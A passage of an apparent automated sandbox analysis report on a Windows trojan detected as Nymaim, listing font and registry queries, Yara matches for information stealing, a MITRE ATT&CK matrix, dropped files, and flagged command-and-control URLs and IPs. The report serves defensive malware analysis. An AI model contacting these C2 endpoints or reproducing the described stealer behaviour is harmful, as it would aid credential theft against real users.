                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Nymaim
                  Source: Yara matchFile source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.24.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.16.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.20.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.21.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.31.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.16.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.28.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.32.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.19.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.18.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.20.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.23.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.8a0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.25.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.30.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.18.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.22.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.26.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.17.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.30.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.32.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.22.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.26.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.29.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.8a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.28.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.27.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.860e67.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.423202429.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.398224905.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.429736065.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.442523411.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.398439269.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.429893490.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.403746103.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.435884900.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.444030795.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.387732465.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.436582562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.389024466.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.429105410.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.397514414.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.404645507.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.443712721.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.397232349.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.404463873.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.449688611.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.384726127.00000000008A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.423616490.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.449473682.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.403954435.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.422077182.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.436080852.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.429267314.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.436745774.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.442728263.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.450741403.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.388613281.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.450525334.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.421209172.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.387383438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts1
                  Windows Management Instrumentation                  		Path Interception12
                  Process Injection                  		11
                  Masquerading                  		1
                  Input Capture                  		111
                  Security Software Discovery                  		Remote Services1
                  Input Capture                  		Exfiltration Over Other Network Medium2
                  Encrypted Channel                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
                  Disable or Modify Tools                  		LSASS Memory2
                  Process Discovery                  		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
                  Ingress Tool Transfer                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
                  Virtualization/Sandbox Evasion                  		Security Account Manager21
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                  Non-Application Layer Protocol                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
                  Process Injection                  		NTDS1
                  Remote System Discovery                  		Distributed Component Object ModelInput CaptureScheduled Transfer113
                  Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Obfuscated Files or Information                  		LSA Secrets1
                  System Network Configuration Discovery                  		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common2
                  Software Packing                  		Cached Domain Credentials1
                  File and Directory Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Timestomp                  		DCSync13
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 715150 Sample: file.exe Startdate: 03/10/2022 Architecture: WINDOWS Score: 96 63 Malicious sample detected (through community Yara rule) 2->63 65 Antivirus detection for URL or domain 2->65 67 Multi AV Scanner detection for dropped file 2->67 69 5 other signatures 2->69 8 file.exe 27 2->8         started        process3 dnsIp4 57 208.67.104.97, 49701, 49703, 80 GRAYSON-COLLIN-COMMUNICATIONSUS United States 8->57 59 85.31.46.167, 49702, 80 CLOUDCOMPUTINGDE Germany 8->59 61 2 other IPs or domains 8->61 35 C:\Users\user\AppData\Local\...\Cleaner.exe, PE32 8->35 dropped 37 C:\Users\user\...\Bunifu_UI_v1.5.3.dll, PE32 8->37 dropped 39 C:\Users\user\AppData\Local\...\dll[1], PE32 8->39 dropped 41 C:\Users\user\AppData\Local\...\soft[1], PE32 8->41 dropped 12 cmd.exe 1 8->12         started        14 WerFault.exe 9 8->14         started        17 WerFault.exe 9 8->17         started        19 9 other processes 8->19 file5 process6 file7 21 Cleaner.exe 14 2 12->21         started        25 conhost.exe 12->25         started        43 C:\ProgramData\Microsoft\...\Report.wer, Unicode 14->43 dropped 45 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->45 dropped 47 C:\ProgramData\Microsoft\...\Report.wer, Unicode 19->47 dropped 49 C:\ProgramData\Microsoft\...\Report.wer, Unicode 19->49 dropped 51 C:\ProgramData\Microsoft\...\Report.wer, Unicode 19->51 dropped 53 5 other malicious files 19->53 dropped 27 conhost.exe 19->27         started        29 taskkill.exe 19->29         started        process8 dnsIp9 55 iplogger.org 148.251.234.83, 443, 49710 HETZNER-ASDE Germany 21->55 71 Multi AV Scanner detection for dropped file 21->71 73 May check the online IP address of the machine 21->73 31 WerFault.exe 21->31         started        33 WerFault.exe 21->33         started        signatures10 process11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe48%ReversingLabsWin32.Trojan.CrypterX
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\soft[1]29%ReversingLabsWin32.Trojan.Lazy
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\dll[1]0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\dll[1]0%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Bunifu_UI_v1.5.3.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Bunifu_UI_v1.5.3.dll0%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe29%ReversingLabsWin32.Trojan.Lazy

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  0.0.file.exe.400000.21.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.31.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.7.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.19.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.5.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.23.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.13.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.25.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.9.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.1.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.17.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.11.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.15.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.29.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.27.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.3.unpack100%AviraHEUR/AGEN.1250671Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte100%URL Reputationmalware
                  http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte100%URL Reputationmalware
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  https://take.rdrct-now.online/go/ZWKA?p78705p298845p11740%URL Reputationsafe
                  https://take.rdrct-now.online/go/ZWKA?p78705p298845p11740%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/siv0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte100%URL Reputationmalware
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://85.31.46.167/software.phpll1%VirustotalBrowse
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://85.31.46.167/software.phpll0%Avira URL Cloudsafe
                  http://www.fontbureau.comcC0%Avira URL Cloudsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.fontbureau.com.TTFh~0%Avira URL Cloudsafe
                  http://107.182.129.235/storage/ping.php0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.galapagosdesign.com/0%URL Reputationsafe
                  http://107.182.129.235/storage/extension.php0%URL Reputationsafe
                  http://85.31.46.167/software.php0%URL Reputationsafe
                  http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst100%URL Reputationmalware
                  http://www.jiyu-kobo.co.jp/C0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                  https://iplogger.orgx0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/x0%URL Reputationsafe
